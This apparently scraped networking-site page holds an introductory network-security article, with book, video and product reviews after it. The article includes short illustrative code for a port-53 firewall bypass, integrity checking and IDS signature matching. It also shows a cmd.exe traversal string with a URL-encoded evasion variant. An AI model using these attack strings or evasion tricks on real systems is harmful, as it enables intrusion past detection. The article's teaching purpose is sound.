Train your employees to recognize web security threats and how to lower the risk of infection. In today's business environment, laptops, smartphones, iPads, and other similar devices are not only used for business purposes, but also for personal and home use. When devices are used at home, the risk of an infection on that device is high and malware could easily be transferred to the business network. This is why employee education is so important.

Patch Management

Good patch management practices should also be in place and implemented using a clearly-defined patch management policy. Operating systems and applications, including browsers, should be updated regularly with the latest available security patches. The browser, whether a mobile version used on a smartphone or a full version used on a computer, is a primary vector for malware attacks and merits particular attention. Using the latest version of a browser is a must, as known vulnerabilities will already have been addressed.

Internet Monitoring Software

Lastly, I would mention the use of internet monitoring software. Internet monitoring software should be able to protect the network against malware, scareware, viruses, phishing attacks and other malicious software. A robust internet monitoring software solution will help to enforce your company's internet usage policy by blocking connections to unacceptable websites, by monitoring downloads, and by monitoring encrypted web traffic going into and out of the network.

There is no single method that can guarantee 100% web security protection, however a well thought-out strategy is one huge step towards minimizing risk that the network could be targeted by the bad guys.

 



  • Hits: 17849

Introduction To Network Security - Part 1

As more and more people and businesses have begun to use computer networks and the Internet, the need for a secure computing environment has never been greater. Right now, information security professionals are in great demand and the importance of the field is growing every day. All the industry leaders have been placing their bets on security in the last few years.

All IT vendors agree today that secure computing is no longer an optional component; it is something that should be integrated into every system rather than being thrown in as an afterthought. In the past, programmers would concentrate on getting a program working, and then (if there was time) try to weed out possible security holes.

Now, applications must be coded from the ground up with security in mind, as these applications will be used by people who expect the security and privacy of their data to be maintained.

This article intends to serve as a very brief introduction to information security with an emphasis on networking.

The reasons for this are twofold:

Firstly, in case you did not notice, this is a networking website;

Secondly, the time a system is most vulnerable is when it is connected to the Internet.

For an understanding of what lies in the following pages, you should have decent knowledge of how the Internet works. You don't need to know the ins and outs of every protocol under the sun, but a basic understanding of network (and obviously computer) fundamentals is essential.

If you're a complete newbie however, do not despair. We would recommend you look under the Networking menu at the top of the site...where you will find our accolade winning material on pretty much everything in networking.

Hacker or Cracker?

There is a well-worn argument against the incorrect use of the word 'hacker' to denote a computer criminal -- the correct term is 'cracker' or, when referring to people who have automated tools and very little real knowledge, 'script kiddie'. Hackers are actually just very adept programmers (the term came from 'hacking the code', where a programmer would quickly program fixes to problems he faced).

While many feel that this distinction has been lost due to the media portraying hackers as computer criminals, we will stick to the original definitions throughout these articles, more than anything to avoid the inevitable flame mail we will get if we don't!

On to the Cool Stuff!

This introduction is broadly broken down into the following parts:

• The Threat to Home Users
• The Threat to the Enterprise
• Common Security Measures Explained
• Intrusion Detection Systems
• Tools an Attacker Uses
• What is Penetration-Testing?
• A Brief Walk-through of an Attack
• Where Can I Find More Information?
• Conclusion

The Threat to Home Users

Many people underestimate the threat they face when they use the Internet. The prevalent mindset is "who would bother to attack me or my computer?" While it is true that an attacker is unlikely to target you individually, to him you are just one more system on the Internet.

Many script kiddies simply unleash an automated tool that will scan large ranges of IP addresses looking for vulnerable systems; when it finds one, the tool will automatically exploit the vulnerability and take control of the machine.

The script kiddie can later use this vast collection of 'owned' systems to launch denial of service (DoS) attacks, or just to cover his tracks by hopping from one system to another in order to hide his real IP address.

This technique of proxying attacks through many systems is quite common, as it makes it very difficult for law enforcement to trace back the route of the attack, especially if the attacker relays it through systems in different geographic locations.

It is very feasible -- in fact quite likely -- that your machine will be in the target range of such a scan, and if you haven't taken adequate precautions, it will be owned.

The other threat comes from computer worms that have recently been the subject of a lot of media attention. Essentially a worm is just an exploit with a propagation mechanism. It works in a manner similar to how the script kiddie's automated tool works -- it scans ranges of IP addresses, infects vulnerable machines, and then uses those to scan further.

Thus the rate of infection increases geometrically as each infected system starts looking for new victims. In theory a worm could be written with such a refined scanning algorithm, that it could infect 100% of all vulnerable machines within ten minutes. This leaves hardly any time for response.

Another threat comes in the form of viruses. Most often these are propagated by email and use some crude form of social engineering (such as using the subject line "I love you" or "Re: The documents you asked for") to trick people into opening them. No form of network level protection can guard against these attacks.

The effects of a virus may range from the mundane (simply spreading to people in your address book) to the devastating (deleting critical system files). A couple of years ago there was an email virus that emailed confidential documents from the popular Windows "My Documents" folder to everyone in the victim's address book.

So while you per se may not be high profile enough to warrant a systematic attack, you are what I like to call a bystander victim: someone who got attacked simply because you could be attacked, and you were there to be attacked.

As broadband and always-on Internet connections become commonplace, attackers are even targeting the IP ranges where they know they will find cable modem customers. They do this because they know they will find unprotected always-on systems here that can be used as a base for launching other attacks.

The Threat to the Enterprise

Most businesses have conceded that having an Internet presence is critical to keep up with the competition, and most of them have realised the need to secure that online presence.

Gone are the days when firewalls were an option and employees were given unrestricted Internet access. These days most medium sized corporations implement firewalls, content monitoring and intrusion detection systems as part of the basic network infrastructure.

For the enterprise, security is very important -- the threats include:

• Corporate espionage by competitors,
• Attacks from disgruntled ex-employees
• Attacks from outsiders who are looking to obtain private data and steal the company's crown jewels (be it a database of credit cards, information on a new product, financial data, source code to programs, etc.)
• Attacks from outsiders who just want to use your company's resources to store pornography, illegal pirated software, movies and music, so that others can download and your company ends up paying the bandwidth bill and in some countries can be held liable for the copyright violations on movies and music.

As far as securing the enterprise goes, it is not enough to merely install a firewall or intrusion detection system and assume that you are covered against all threats. The company must have a complete security policy, and basic training must be imparted to all employees telling them things they should and should not do, as well as who to contact in the event of an incident. Larger companies may even have an incident response or security team to deal specifically with these issues.

One has to understand that security in the enterprise is a 24/7 problem. There is a famous saying, "A chain is only as strong as its weakest link", the same rule applies to security.

After the security measures are put in place, someone has to take the trouble to read the logs, occasionally test the security, follow mailing-lists of the latest vulnerabilities to make sure software and hardware is up-to-date etc. In other words, if your organisation is serious about security, there should be someone who handles security issues.

This person is often a network administrator, but invariably, in the chaotic throes of day-to-day administration (yes, we all dread user support calls! :) the security of the organisation gets compromised -- for example, an admin who needs to deliver 10 machines to a new department may not password protect the administrator account, just because it saves him some time and lets him meet a deadline. In short, an organisation is either serious about security issues or does not bother with them at all.

While the notion of 24/7 security may seem paranoid to some people, one has to understand that in a lot of cases a company is not specifically targeted by an attacker. The company's network just happens to be one that the attacker knows how to break into, and thus it gets targeted. This is often the case in attacks where company FTP or web servers have been used to host illegal material.

The attackers don't care what the company does - they just know that this is a system accessible from the Internet where they can store large amounts of warez (pirated software), music, movies, or pornography. This is actually a much larger problem than most people are aware of because, in many cases, the attackers are very good at hiding the illegal data. It's only when the bandwidth bill has to be paid that someone realises that something is amiss.

Firewalls

By far the most common security measure these days is a firewall. A lot of confusion surrounds the concept of a firewall, but it can basically be defined as any perimeter device that permits or denies traffic based on a set of rules configured by the administrator. Thus a firewall may be as simple as a router with access-lists, or as complex as a set of modules distributed through the network and controlled from one central location.

The firewall protects everything 'behind' it from everything in front of it. Usually the 'front' of the firewall is its Internet facing side, and the 'behind' is the internal network. The way firewalls are designed to suit different types of networks is called the firewall topology.

Here is the link to a detailed explanation of different firewall topologies: Firewall.cx Firewall Topologies

You also get what are known as 'personal firewalls' such as ZoneAlarm, Sygate Personal Firewall, Tiny Personal Firewall, Symantec Endpoint Security etc.

These are packages that are meant for individual desktops and are fairly easy to use. The first thing they do is make the machine invisible to pings and other network probes. Most of them also let you choose what programs are allowed to access the Internet, therefore you can allow your browser and mail client, but if you see some suspicious program trying to access the network, you can disallow it. This is a form of 'egress filtering' or outbound traffic filtering and provides very good protection against trojan horse programs and worms.

However, firewalls are no cure-all solution to network security woes. A firewall is only as good as its rule set, and there are many ways an attacker can find common misconfigurations and errors in the rules. For example, say the firewall blocks all traffic except traffic originating from port 53 (DNS) so that everyone can resolve names; the attacker could then use this rule to his advantage. If he changes the source port of his attack or scan to port 53, the firewall will allow all of his traffic through because it assumes it is DNS traffic.
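
The sketch below models that misconfiguration: the rule logic trusts anything whose source port is 53, so an attacker who simply sets his source port to 53 gets through. The packet and rule structures are invented for illustration and do not correspond to any particular firewall's syntax.

```python
from dataclasses import dataclass

@dataclass
class Packet:
    src_port: int
    dst_port: int

def naive_firewall_allows(packet: Packet) -> bool:
    # Mis-written rule: "allow anything that looks like a DNS reply",
    # keyed only on the source port, with a default deny for everything else.
    if packet.src_port == 53:
        return True
    return False

if __name__ == "__main__":
    dns_reply = Packet(src_port=53, dst_port=33000)
    attack = Packet(src_port=53, dst_port=22)   # attacker sets his source port to 53
    print(naive_firewall_allows(dns_reply))  # True - the intended case
    print(naive_firewall_allows(attack))     # True - the scan/attack slips through
```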

Bypassing firewalls is a whole study in itself, and one which is very interesting especially to those with a passion for networking, as it normally involves misusing the way TCP and IP are supposed to work. That said, firewalls today are becoming very sophisticated and a well installed firewall can severely thwart a would-be attacker's plans.

It is important to remember that the firewall does not look into the data section of the packet; thus, if you have a webserver that is vulnerable to a CGI exploit and the firewall is set to allow traffic to it, there is no way the firewall can stop an attacker from attacking the webserver, because it does not look at the data inside the packet. This would be the job of an intrusion detection system (covered further on).

Anti-Virus Systems

Everyone is familiar with the desktop version of anti-virus packages like Norton AntiVirus and McAfee. The way these operate is fairly simple -- when researchers find a new virus, they figure out some unique characteristic it has (maybe a registry key it creates or a file it replaces) and out of this they write the virus 'signature'.

The whole load of signatures that your antivirus scans for is known as the virus 'definitions'. This is the reason why keeping your virus definitions up-to-date is very important. Many anti-virus packages have an auto-update feature for you to download the latest definitions. The scanning ability of your software is only as good as the date of your definitions. In the enterprise, it is very common for admins to install anti-virus software on all machines, but have no policy for regular update of the definitions. This is meaningless protection and serves only to provide a false sense of security.

With the recent spread of email viruses, anti-virus software at the MTA (Mail Transfer Agent, also known as the 'mail server') is becoming increasingly popular. The mail server will automatically scan any email it receives for viruses and quarantine the infections. The idea is that since all mail passes through the MTA, this is the logical point to scan for viruses. Given that most mail servers have a permanent connection to the Internet, they can regularly download the latest definitions. On the downside, these can be evaded quite simply. If you zip up the infected file or trojan, or encrypt it, the anti-virus system may not be able to scan it.

End users must be taught how to respond to anti-virus alerts. This is especially true in the enterprise -- an attacker doesn't need to try and bypass your fortress-like firewall if all he has to do is email trojans to a lot of people in the company. It just takes one uninformed user to open the infected package, and the attacker will have a backdoor to the internal network.

It is advisable that the IT department gives a brief seminar on how to handle email from untrusted sources and how to deal with attachments. These are very common attack vectors simply because you may harden a computer system as much as you like, but the weak point still remains the user who operates it. As crackers say 'The human is the path of least resistance into the network'.

Intrusion Detection Systems

IDSs have become the 'next big thing', the way firewalls were some time ago. There are basically two types of Intrusion Detection Systems:

• Host based IDS
• Network based IDS

Host based IDS - These are installed on a particularly important machine (usually a server or some other important target) and are tasked with making sure that the system state matches a particular set baseline. Take, for example, the popular file-integrity checker Tripwire -- this program is run on the target machine just after it has been installed. It creates a database of file signatures for the system and regularly checks the current system files against their known 'safe' signatures. If a file has been changed, the administrator is alerted. This works very well, as most attackers will replace a common system file with a trojaned version to give them backdoor access.
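
Stripped to its essentials, a file-integrity checker of this kind is "hash everything once, then compare later". The sketch below illustrates that idea only; it is not Tripwire's actual implementation, and the target directory is a placeholder.

```python
import hashlib
from pathlib import Path
from typing import Dict, List

def build_baseline(root: Path) -> Dict[str, str]:
    """Record a SHA-256 hash for every file under root (run just after install)."""
    return {
        str(p): hashlib.sha256(p.read_bytes()).hexdigest()
        for p in root.rglob("*") if p.is_file()
    }

def check_against_baseline(root: Path, baseline: Dict[str, str]) -> List[str]:
    """Return the files whose current hash no longer matches the baseline."""
    current = build_baseline(root)
    return [path for path, digest in baseline.items() if current.get(path) != digest]

if __name__ == "__main__":
    system_dir = Path("/usr/local/bin")      # placeholder target directory
    baseline = build_baseline(system_dir)
    # ... later, on a schedule ...
    for changed in check_against_baseline(system_dir, baseline):
        print(f"ALERT: {changed} has been modified")
```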

Network based IDS - These are more popular and quite easy to install. Basically they consist of a normal network sniffer running in promiscuous mode (in this mode the network card picks up all traffic, even if it's not meant for it). The sniffer is attached to a database of known attack signatures and the IDS analyses each packet that it picks up to check for known attacks. For example, a common web attack might contain the string '/system32/cmd.exe?' in the URL. The IDS will have a match for this in the database and will alert the administrator.
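
At its simplest, signature matching is a substring search over the packet payload against a database of known-bad patterns, as in this toy sketch (the signature list is obviously a stand-in for a real rule set).

```python
from typing import List

# Toy signature database: pattern -> human-readable alert name.
SIGNATURES = {
    b"/system32/cmd.exe?": "IIS directory traversal attempt",
    b"/etc/passwd": "Unix password file probe",
}

def inspect_payload(payload: bytes) -> List[str]:
    """Return the names of all signatures found in this packet's payload."""
    return [name for pattern, name in SIGNATURES.items() if pattern in payload]

if __name__ == "__main__":
    packet = b"GET /scripts/..%255c../system32/cmd.exe?/c+dir HTTP/1.0"
    for alert in inspect_payload(packet):
        print("ALERT:", alert)
```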

Newer IDSs support active prevention of attacks - instead of just alerting an administrator, the IDS can dynamically update the firewall rules to disallow traffic from the attacking IP address for some amount of time. Or the IDS can use 'session sniping' to fool both sides of the connection into closing down so that the attack cannot be completed.

Unfortunately, IDS systems generate a lot of false positives (a false positive is basically a false alarm, where the IDS sees legitimate traffic and for some reason matches it against an attack pattern). This tempts a lot of administrators into turning them off or, even worse, not bothering to read the logs. This may result in an actual attack being missed.

IDS evasion is also not all that difficult for an experienced attacker. The signature is based on some unique feature of the attack, and so the attacker can modify the attack so that the signature is not matched. For example, the above attack string '/system32/cmd.exe?' could be rewritten in hexadecimal to look something like the following:

'%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f'

This might be totally missed by the IDS. Furthermore, an attacker could split the attack into many packets by fragmenting the packets. This means that each packet would only contain a small part of the attack and the signature would not match. Even if the IDS is able to reassemble fragmented packets, this creates a time overhead, and since IDSs have to run at near real-time status, they tend to drop packets while they are processing. IDS evasion is a topic for a paper on its own.
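
Continuing the toy example above, URL-encoding the payload is enough to defeat a matcher that only inspects the raw bytes, while decoding (normalising) the traffic before matching restores detection. This illustrates the principle only, not the behaviour of any particular IDS.

```python
from urllib.parse import unquote

SIGNATURE = b"/system32/cmd.exe?"
ENCODED_ATTACK = b"GET /scripts/%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f/c+dir"

def naive_match(payload: bytes) -> bool:
    # Looks only at the raw bytes, so the encoded form is missed.
    return SIGNATURE in payload

def normalised_match(payload: bytes) -> bool:
    # URL-decode the payload first, then look for the signature.
    decoded = unquote(payload.decode("ascii", errors="replace")).encode()
    return SIGNATURE in decoded

if __name__ == "__main__":
    print(naive_match(ENCODED_ATTACK))       # False - evaded
    print(normalised_match(ENCODED_ATTACK))  # True  - detected after decoding
```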

The advantage of a network based IDS is that it is very difficult for an attacker to detect. The IDS itself does not need to generate any traffic, and in fact many of them have a broken TCP/IP stack so they don't have an IP address. Thus the attacker does not know whether the network segment is being monitored or not.

Patching and Updating

It is embarrassing and sad that this has to be listed as a security measure. Despite being one of the most effective ways to stop an attack, there is a tremendously laid-back attitude to regularly patching systems. There is no excuse for not doing this, and yet the level of patching remains woefully inadequate. Take for example the MSBlaster worm that wreaked havoc recently. The exploit was known almost a month in advance, and a patch had been released, yet millions of users and businesses were infected. While admins know that having to patch 500 machines is a laborious task, the way I look at it is that I would rather be updating my systems on a regular basis than waiting for disaster to strike and then running around trying to patch and clean up those 500 systems.

For the home user, it's a simple matter of running the automatic update software that every worthwhile OS comes with. In the enterprise there is no 'easy' way to patch large numbers of machines, but there are patch deployment mechanisms that take a lot of the burden away. Frankly, it is part of an admin's job to do this, and when a network is horribly fouled up by the latest worm it just means someone, somewhere didn't do his job well enough.

Click here to read 'Introduction to Network Security - Part 2'

  • Hits: 76733

The VIRL Book – A Guide to Cisco’s Virtual Internet Routing Lab (Cisco Lab)

cisco-virl-book-guide-to-cisco-virtual-internet-routing-lab-1Cisco’s Virtual Internet Routing Lab (VIRL) is a network simulation tool developed by Cisco that allows engineers, certification candidates and network architects to create their own Cisco Lab using the latest Cisco IOS devices such as Routers, Catalyst or Nexus switches, ASA Firewall appliances and more.

Read Jack Wang's Introduction to Cisco VIRL article to find out more information about the product

Being a fairly new but extremely promising product, it’s quickly becoming the standard tool for Cisco Lab simulations. Managing and operating Cisco VIRL might have its challenges, especially for those new to the virtualization world, but one of the biggest problems has been the lack of dedicated online resources for VIRL management, leaving a lot of unanswered questions on how to use VIRL for different types of simulations, how to build topologies, how to fine-tune them, etc.

The recent publication of “The VIRL Book” by Jack Wang has changed the game for VIRL users. Tasks outlined above plus a lot more are now becoming easier to handle, helping users manage their VIRL server in an effective and easy to understand way.

The introduction to VIRL has been well crafted by Jack, as he addresses each and every aspect of VIRL: why one should opt for VIRL, what VIRL can offer and how it differs from other simulation tools.

This unique title addresses all possible aspects of VIRL and has been written to satisfy even the most demanding users seeking to create complex network simulations. Key topics covered include:

  • Planning the VIRL Installation
  • Installing VIRL
  • Creating your first simulation
  • Basic operation & best practices
  • Understanding the anatomy of VIRL
  • External Connectivity to the world
  • Advanced features
  • Use VIRL for certifications
  • Running 3rd party virtual machines
  • Sample Network Topologies

The Planning the VIRL Installation section walks through the various VIRL installation options, be it a virtual machine, a bare metal installation or the cloud, and what kind of hardware suits the VIRL installation. This makes life easier for VIRL users, ensuring they plan well and select the right hardware for their VIRL installation.

Figure 1. Understanding the Cisco VIRL work-flow

The Installing VIRL section is quite engaging, as Jack walks through the installation of VIRL on various platforms such as VMware vSphere ESXi, VMware Fusion, VMware Workstation, bare metal and the cloud. All these installations are described in simple steps and with great illustrations. The troubleshooting part happens to be the cream of this section as it dives into small details such as BIOS settings and more, proving how attentive the author is to simplifying troubleshooting.

The Creating your first simulation section is very helpful, as it goes through in depth how to create a simulation, compares Design mode and Simulation mode, covers generating initial configurations, and so on. This section really helped us to understand VIRL in depth, especially how to create a simulation with auto configurations.

The External connectivity to the world section helps the user open up to a new world of virtualization and lab simulations. Jack really mastered this section and simplified the concepts of FLAT network and SNAT network while at the same time dealing with issues like how to add 3rd party virtual machines into VIRL. The Palo Alto Firewall integration happens to be our favorite.

To summarize, this title is a must guide for all Cisco VIRL users as it deals with every aspect of VIRL and we believe this not only simplifies the use of the product but also helps users understand how far they can go with it. Jack’s hard work and insights are visible in every section of the book and we believe it’s not an easy task to come out with such a great title. We certainly congratulate Jack. This is a title that should not be missing from any Cisco VIRL user’s library.

  • Hits: 15885

Cisco Press Review for “Cisco Firepower and Advanced Malware Protection Live Lessons” Video Series

Title:              Cisco Firepower & Advanced Malware Protection Live Lessons
Authors:        Omar Santos
ISBN-10:       0-13-446874-0
Publisher:     Cisco Press
Published:    June 22, 2016
Edition:         1st Edition
Language:    English

cisco-firepower-and-advanced-malware-protection-live-lessons-1The “Cisco Firepower and Advanced Malware Protection Live Lessons” video series by Omar Santos is the icing on the cake for someone who wants to start their journey of Cisco Next-Generation Network Security. This video series contains eight lessons on the following topics:

Lesson 1: Fundamentals of Cisco Next-Generation Network Security

Lesson 2: Introduction and Design of Cisco ASA with FirePOWER Services

Lesson 3: Configuring Cisco ASA with FirePOWER Services

Lesson 4: Cisco AMP for Networks

Lesson 5: Cisco AMP for Endpoints

Lesson 6: Cisco AMP for Content Security

Lesson 7: Configuring and Troubleshooting the Cisco Next-Generation IPS Appliances

Lesson 8: Firepower Management Center

Lesson 1 deals with the fundamentals of Cisco Next-Generation Network Security products, like security threats, Cisco ASA Next-Generation Firewalls, FirePOWER Modules, Next-Generation Intrusion Prevention Systems, Advanced Malware Protection (AMP), Email Security, Web Security, Cisco ISE, Cisco Meraki Cloud Solutions and much more. Omar Santos has done an exceptional job creating short videos, which are a maximum of 12 minutes each. He really built up the series with a very informative introduction dealing with the security threats the industry is currently facing, the emergence of the Internet of Things (IoT) and its impact, and the challenges of detecting threats.

Lesson 2 deals with the design aspects of the ASA FirePOWER Service module: how it can be deployed in production networks, how High-Availability (HA) works, how ASA FirePOWER services can be deployed at the Internet Edge, and the VPN scenarios it supports. The modules in this lesson are very brief and provide an overview; anyone looking for in-depth information will need to refer to the Cisco documentation.

Lesson 3 is the most important lesson of the series, as it deals with the initial setup of the Cisco ASA FirePOWER Module in Cisco ASA 5585-X and Cisco ASA 5500-X appliances. Omar also demonstrates how the Cisco ASA redirects traffic to the Cisco ASA FirePOWER module, and he concludes the lesson with basic troubleshooting steps.

Lessons 4, 5 and 6 are dedicated to Cisco AMP for networks, endpoints and content security. Omar walks through an introduction to AMP, and each lesson deals with various options; together they provide a good overview of AMP, and he has done a commendable job keeping it flowing smoothly. Cisco AMP for Endpoints is quite interesting, as Omar articulates the information in a much easier way and the demonstrations are good to watch.

The best part of this video series is the Lesson that deals with the configuration of Cisco ASA with FirePOWER services, in a very brief way Omar shows the necessary steps for the successful deployment in the Cisco ASA 5585-X and Cisco ASA 5500-X platform.

The great thing about Cisco Press is that it ensures one doesn't need to hunt for reference or study materials; it always has very informative products in the form of videos and books. You can download these videos and watch them at your own pace.

To conclude, the video series is really good to watch, as it deals with the various topics of Cisco Next-Generation Security products in lessons of less than 13 minutes, and the language used is quite simple and easy to understand. However, this video series could do with more live demonstrations, especially a demonstration on how to reimage the ASA appliances to install the Cisco FirePOWER module.

This is a highly recommended product especially for engineers interested in better understanding how Cisco’s Next-Generation security products operate and more specifically the Cisco FirePOWER services, Cisco AMP and advanced threat detection & protection.

  • Hits: 10014

Cisco CCNP Routing & Switching v2.0 – Official Cert Guide Library Review (Route 300-101, Switch 300-115 & Tshoot 300-135)

Title:          Cisco CCNP Routing & Switching v2.0 – Official Cert Guide Library
Authors:    Kevin Wallace, David Hucaby, Raymond Lacoste    
ISBN-13:    978-1-58720-663-4
Publisher:  Cisco Press
Published:  December 23rd, 2014
Edition:      1st Edition
Language:  English

Reviewer: Chris Partsenidis

star-5  

CCNP Routing and Switching - Library V2 ISBN 0-13-384596-6The Cisco CCNP Routing and Switching (CCNP R&S) certification is the most popular Cisco Professional series certification at the moment, requiring candidates sit and pass three professional level exams: Route 300-101, Switch 300-115 & Tshoot 300-135.

The Cisco Press CCNP R&S v2.0 Official Cert Guide Library has been updated to reflect the latest CCNP R&S curriculum updates (2014) and is perhaps the only comprehensive study guide out there, that guarantees to help you pass all three exams on your first try, saving money, time and unwanted disappointments – and ‘no’ - this is not a sales pitch as I personally used the library for my recently acquired CCNP R&S certification!  I’ll be writing about my CCNP R&S certification path experience very soon on Firewall.cx.

The CCNP R&S v2 Library has been written by three well-known CCIE veteran engineers (Kevin Wallace, David Hucaby, Raymond Lacoste) and, with the help and care of Cisco Press, they’ve managed to produce the best CCNP R&S study guide out there. While the CCNP R&S Library is aimed at CCNP certification candidates, it can also serve as a great reference guide for those seeking to increase their knowledge of advanced networking topics and technologies and improve their troubleshooting skills.

The Cisco Press CCNP R&S v2 Library is not just a simple update to the previous study guide. Key topics for each of the three exams are now clearer than ever, with plentiful examples, great diagrams, finer presentation and analysis.

The CCNP Route exam (300-101) emphasizes a number of technologies and features that are also reflected in the ROUTE study guide book. IPv6 (dual-stack), EIGRP IPv6 & OSPF IPv6, RIPng (RIP IPv6), NAT (IPv4 & IPv6) and VPN concepts (DMVPN and Easy VPN) are amongst the list of ‘hot’ topics covered in the ROUTE book. Similarly, the CCNP Switch exam (300-115) emphasizes, amongst other topics, Cisco StackWise, Virtual Switching System (VSS) and advanced Spanning Tree Protocol implementations – all of which are covered extensively in the SWITCH book.

Each of the three books is accompanied by a CD, containing over 200 practice questions (per CD) that are designed to help prepare the candidate for the real exam. Additional material on each CD includes memory table exercises and answer keys, a generous amount of videos, plus a study planner tool – that’s pretty much everything you’ll need for a successful preparation and achieving the ultimate goal: passing each exam.

Using the CCNP R&S v2 Library to help me prepare for each CCNP exam was the best thing I did after making the decision to pursue the CCNP certification. Now it’s proudly sitting amongst my other study guides and used occasionally when I need a refresh on complex networking topics.

  • Hits: 15847

GFI’s LANGUARD Update – The Most Trusted Patch Management Tool & Vulnerability Scanner Just Got Better!

gfi-languardGFI’s LanGuard is one of the world’s most popular and trusted patch management & vulnerability scanner products designed to effectively monitor and manage networks of any size. IT Administrators, Network Engineers and IT Managers who have worked with Languard would surely agree that the above statement is no exaggeration.

Readers who haven’t heard or worked with GFI’s LanGuard product should definitely visit our LanGuard 2014 product review and read about the features this unique network security product offers and download their free copy.

GFI recently released an update to LanGuard, taking the product to a whole new level by providing new key-features that have caught us by surprise.

Following is a short list of them:

  • Mobile device scanning:  customers can audit mobile devices that connect to Office 365, Google Apps and Apple Profile Manager.
  • Expanded vulnerability assessment for network devices: GFI LanGuard 2014 R2 offers vulnerability assessment of routers, printers and switches from the following vendors: Cisco, 3Com, Dell, SonicWALL, Juniper Networks, NETGEAR, Nortel, Alcatel, IBM and Linksys. 
  • CIPA compliance reports: additional reporting to ensure US schools and libraries adhere to the Children’s Internet Protection Act (CIPA). GFI LanGuard now has dedicated compliance reports for 11 security regulations and standards, including PCI DSS, HIPAA, SOX and PSN CoCo.
  • Support for Fedora: Fedora is the 7th Linux distribution supported by LanGuard for automatic patch management.
  • Chinese Localization: GFI LanGuard 2014 R2 is now also available in Chinese Traditional and Simplified versions.

One of the features we loved was the incredible support of Cisco products. With its latest release, GFI LanGuard supports over 1500 different Cisco products ranging from routers (including the newer ISR Gen 2), Catalyst switches (Layer2 & Layer3 switches), Cisco Nexus switches, Cisco Firewalls (PIX & ASA Series), VPN Gateways, Wireless Access points, IPS & IDS Sensors, Voice Gateways and much more!

  • Hits: 10638

CCIE Collaboration Quick Reference Review

Title:              CCIE Collaboration Quick Reference
Authors:        Akhil Behl
ASIN:             B00KDIM9FI
Publisher:      Cisco Press
Published:     May 16, 2014
Edition:         1st Edition
Language:     English

Reviewer: Arani Mukherjee

star-5  

0-13-384596-6This ebook has been designed for a specific target audience, as the title of the book suggests; hence it cannot be faulted for not being suitable for all levels of Cisco expertise. Furthermore, since it is a quick reference, there is no scope for something like poetic licence. As a quick reference, it achieves the two key aims:

1) Provide precise information
2) Do it in a structured format

And it eliminates any complexity or ambiguity on the subject matter by adhering to these two key aims.

Readers of this review have to bear in mind that the review is not about the content/subject matter and its technical accuracy. This has already been achieved by the technical reviewer, as mentioned in the formative sections of the ebook. This review is all about how effectively the ebook manages to deliver key information to its users.

So, to follow up on that dictum, it would be wise to scan through how the material has been laid out.

It revolves around the Cisco Unified Communication (UC) workspace service infrastructure and explains what it stands for and how it delivers what it promises. So the first few chapters are all about the deployment of this service. Quality of Service (QoS) follows deployment; this chapter is dedicated entirely to ensuring that the network infrastructure provides the classification policies and scheduling needed for multiple network traffic classes.

The next chapter is Telephony Standards and Protocols. This chapter talks about the various voice based protocols and their respective criteria. These include analog, digital and fax communication protocols.

From this point onwards the reference material concentrates purely on the Cisco Unified Communication platform. It discusses the relevant subsections of CUCM in the following line-up:

  • Cisco Unified Communications Manager
  • Cisco Unified Communications Security
  • Cisco Unity Connection
  • Cisco Unified Instant Messaging and Presence
  • Cisco Unified Contact Centre Express
  • Cisco IOS Unified Communications Applications &
  • Cisco Collaboration Network Management

In conclusion, what we need to prove or disprove are the key aims of a quick reference:

Does it provide precise information? - The answer is Yes. It does so due to the virtue that it is a reference guide. Information has to be precise as it would be used in situations where credibility or validity won't be questioned.

Does it do the above in a structured manner? - The answer is Yes. The layout of the chapters in its current form helps to achieve that. The trajectory of the discussion through the material ensures it as well.

Does it eliminate any complexity and ambiguity? - The answer again is Yes. This is a technical reference material and not a philosophical debate penned down for the benefit of its readers. The approach of the author is very simplistic. It follows the natural order of events from understanding the concept, deploying the technology and ensuring quality of the services, to managing the technology to provide a robust efficient workspace environment.

In addition to the above proof it needs to be mentioned that, since it is an eBook, users will find it easy to use it from various mobile platforms like tablets or smart phones. It wouldn’t be easy to carry around a 315 page reference guide, even if it was printed on both sides of the paper!

For its target audience, this eBook will live up to its readers’ expectations and is highly recommended for anyone pursuing the CCIE Collaboration or CCNP Voice certification.

  • Hits: 14657

CCIE Collaboration Quick Reference Exam Guide

Title:             CCIE Collaboration Quick Reference
Authors:        Akhil Behl
ISBN-10(13): 0-13-384596-6
Publisher:      Cisco Press
Published:      May  2014
Edition:          1st Edition
Language:      English

star-5

CCIE Collaboration Quick ReferenceThis title addresses the current CCIE Collaboration exam from both a written and lab exam perspective. The title helps CCIE aspirants to achieve the CCIE Collaboration certification and excel in their professional career. The ebook is now available for pre-order and is scheduled for release on 16 May 2014.
 
Here’s the excerpt from Cisco Press website:

CCIE Collaboration Quick Reference provides you with detailed information, highlighting the key topics on the latest CCIE Collaboration v1.0 exam. This fact-filled Quick Reference allows you to get all-important information at a glance, helping you to focus your study on areas of weakness and to enhance memory retention of important concepts. With this book as your guide, you will review and reinforce your knowledge of and experience with collaboration solutions integration and operation, configuration, and troubleshooting in complex networks. You will also review the challenges of video, mobility, and presence as the foundation for workplace collaboration solutions. Topics covered include Cisco collaboration infrastructure, telephony standards and protocols, Cisco Unified Communications Manager (CUCM), Cisco IOS UC applications and features, Quality of Service and Security in Cisco collaboration solutions, Cisco Unity Connection, Cisco Unified Contact Center Express, and Cisco Unified IM and Presence.

This book provides a comprehensive final review for candidates taking the CCIE Collaboration v1.0 exam. It steps through exam objectives one-by-one, providing concise and accurate review for all topics. Using this book, exam candidates will be able to easily and effectively review test objectives without having to wade through numerous books and documents for relevant content for final review.

Table of Contents

Chapter 1 Cisco Collaboration Infrastructure
Chapter 2 Understanding Quality of Service
Chapter 3 Telephony Standards and Protocols
Chapter 4 Cisco Unified Communications Manager
Chapter 5 Cisco Unified Communications Security
Chapter 6 Cisco Unity Connection
Chapter 7 Cisco Unified IM Presence
Chapter 8 Cisco Unified Contact Center Express
Chapter 9 Cisco IOS UC Applications
Chapter 10 Cisco Collaboration Network Management

 If you are considering sitting for your CCIE Collaboration exam, then this is perhaps one of the most valuable resources you'll need to get your hands on!
  • Hits: 11977

Network Security Product Review: GFI LanGuard 2014 - The Ultimate Tool for Admins and IT Managers

Review by Arani Mukherjee

